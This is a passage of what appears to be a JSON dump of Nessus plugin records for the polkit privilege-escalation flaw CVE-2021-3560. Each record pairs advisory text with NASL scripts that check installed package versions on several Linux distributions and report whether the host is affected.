(CVE-2021-3560)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security\nadvisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional\nissues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2022-1090\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1f4e817d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected polkit packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/02/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/02/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:polkit-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:polkit-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:polkit-libs\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:huawei:euleros:uvp:3.0.6.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nvar uvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.6.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.6.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nvar flag = 0;\n\nvar pkgs = [\n \"polkit-0.115-2.h13.eulerosv2r8\",\n \"polkit-devel-0.115-2.h13.eulerosv2r8\",\n \"polkit-docs-0.115-2.h13.eulerosv2r8\",\n \"polkit-libs-0.115-2.h13.eulerosv2r8\"\n];\n\nforeach (var pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"polkit\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-02T15:02:52", 
"description": "According to the versions of the polkit packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests, elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged local attacker to, for example, create a new local administrator. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. (CVE-2021-3560)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2021-09-27T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP9 : polkit (EulerOS-SA-2021-2537)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:polkit", "p-cpe:/a:huawei:euleros:polkit-libs", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2021-2537.NASL", "href": "https://www.tenable.com/plugins/nessus/153754", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153754);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"EulerOS 2.0 SP9 : polkit (EulerOS-SA-2021-2537)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the polkit packages installed, the EulerOS 
installation on the remote host is affected by\nthe following vulnerabilities :\n\n - It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests,\n elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged\n local attacker to, for example, create a new local administrator. The highest threat from this\n vulnerability is to data confidentiality and integrity as well as system availability. (CVE-2021-3560)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security\nadvisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional\nissues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-2537\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c0c8ff0a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected polkit packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", 
value:\"2021/09/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:polkit-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nvar uvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\");\n\nvar sp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(9)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\");\n\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nvar flag = 0;\n\nvar pkgs = [\n \"polkit-0.116-5.h6.eulerosv2r9\",\n 
\"polkit-libs-0.116-5.h6.eulerosv2r9\"\n];\n\nforeach (var pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"9\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"polkit\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-04T14:54:56", "description": "The remote host is affected by the vulnerability described in GLSA-202107-31 (polkit: Privilege escalation)\n\n The function polkit_system_bus_name_get_creds_sync() was called without checking for error, and as such temporarily treats the authentication request as coming from root.\n Impact :\n\n Please review the referenced CVE identifiers for details.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2022-01-24T00:00:00", "type": "nessus", "title": "GLSA-202107-31 : polkit: Privilege escalation", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-15T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:polkit", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-202107-31.NASL", "href": "https://www.tenable.com/plugins/nessus/156969", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 202107-31.\n#\n# The advisory text is Copyright (C) 2001-2023 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(156969);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/15\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"GLSA\", value:\"202107-31\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"GLSA-202107-31 : polkit: Privilege escalation\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is affected by the vulnerability described in GLSA-202107-31\n(polkit: Privilege escalation)\n\n The function polkit_system_bus_name_get_creds_sync() was called without\n checking for error, and as such temporarily treats the authentication\n request as coming from root.\n \nImpact :\n\n Please review the referenced CVE identifiers for details.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/202107-31\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"All polkit users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=sys-auth/polkit-0.119'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/02/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"sys-auth/polkit\", unaffected:make_list(\"ge 0.119\"), vulnerable:make_list(\"lt 0.119\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"polkit\");\n}\n", 
"cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-15T15:55:44", "description": "The remote SUSE Linux SUSE15 host has packages installed that are affected by a vulnerability as referenced in the openSUSE-SU-2021:1843-1 advisory.\n\n - polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-07-16T00:00:00", "type": "nessus", "title": "openSUSE 15 Security Update : polkit (openSUSE-SU-2021:1843-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libpolkit0", "p-cpe:/a:novell:opensuse:libpolkit0-32bit", "p-cpe:/a:novell:opensuse:polkit", "p-cpe:/a:novell:opensuse:polkit-devel", "p-cpe:/a:novell:opensuse:typelib-1_0-polkit-1_0", "cpe:/o:novell:opensuse:15.3"], "id": "OPENSUSE-2021-1843.NASL", "href": "https://www.tenable.com/plugins/nessus/151717", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# openSUSE Security Update openSUSE-SU-2021:1843-1. 
The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151717);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"openSUSE 15 Security Update : polkit (openSUSE-SU-2021:1843-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SUSE15 host has packages installed that are affected by a vulnerability as referenced in the\nopenSUSE-SU-2021:1843-1 advisory.\n\n - polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186497\");\n # https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/2NCYKG2YTUVFTW5R7DJWWWJGLDWU7XE5/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f7e3dbaa\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-3560\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpolkit0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpolkit0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:polkit-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-Polkit-1_0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.3\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/SuSE/release');\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 'openSUSE');\nos_ver = pregmatch(pattern: \"^SUSE([\\d.]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'openSUSE');\nos_ver = os_ver[1];\nif (release !~ \"^(SUSE15\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, 'openSUSE', '15.3', release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'openSUSE ' + os_ver, cpu);\n\npkgs = [\n {'reference':'libpolkit0-0.116-3.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libpolkit0-32bit-0.116-3.3.1', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-0.116-3.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-devel-0.116-3.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'typelib-1_0-Polkit-1_0-0.116-3.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n cpu = NULL;\n rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if 
(!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'libpolkit0 / libpolkit0-32bit / polkit / polkit-devel / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-02T15:22:18", "description": "The remote AlmaLinux 8 host has packages installed that are affected by a vulnerability as referenced in the ALSA-2021:2238 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-02-09T00:00:00", "type": "nessus", "title": "AlmaLinux 8 : polkit (ALSA-2021:2238)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:alma:linux:polkit", "p-cpe:/a:alma:linux:polkit-devel", "p-cpe:/a:alma:linux:polkit-docs", "p-cpe:/a:alma:linux:polkit-libs", "cpe:/o:alma:linux:8"], "id": "ALMA_LINUX_ALSA-2021-2238.NASL", "href": "https://www.tenable.com/plugins/nessus/157562", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# AlmaLinux Security Advisory ALSA-2021:2238.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(157562);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"ALSA\", value:\"2021:2238\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", 
value:\"2023/06/02\");\n\n script_name(english:\"AlmaLinux 8 : polkit (ALSA-2021:2238)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote AlmaLinux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote AlmaLinux 8 host has packages installed that are affected by a vulnerability as referenced in the\nALSA-2021:2238 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://errata.almalinux.org/8/ALSA-2021-2238.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:alma:linux:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:alma:linux:polkit-devel\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:alma:linux:polkit-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:alma:linux:polkit-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:8\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Alma Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AlmaLinux/release\", \"Host/AlmaLinux/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/AlmaLinux/release');\nif (isnull(release) || 'AlmaLinux' >!< release) audit(AUDIT_OS_NOT, 'AlmaLinux');\nvar os_ver = pregmatch(pattern: \"AlmaLinux release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'AlmaLinux');\nvar os_ver = os_ver[1];\nif (! 
preg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'AlmaLinux 8.x', 'AlmaLinux ' + os_ver);\n\nif (!get_kb_item('Host/AlmaLinux/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'AlmaLinux', cpu);\n\nvar pkgs = [\n {'reference':'polkit-0.115-11.el8_4.1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-devel-0.115-11.el8_4.1', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-devel-0.115-11.el8_4.1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-docs-0.115-11.el8_4.1', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-libs-0.115-11.el8_4.1', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-libs-0.115-11.el8_4.1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var 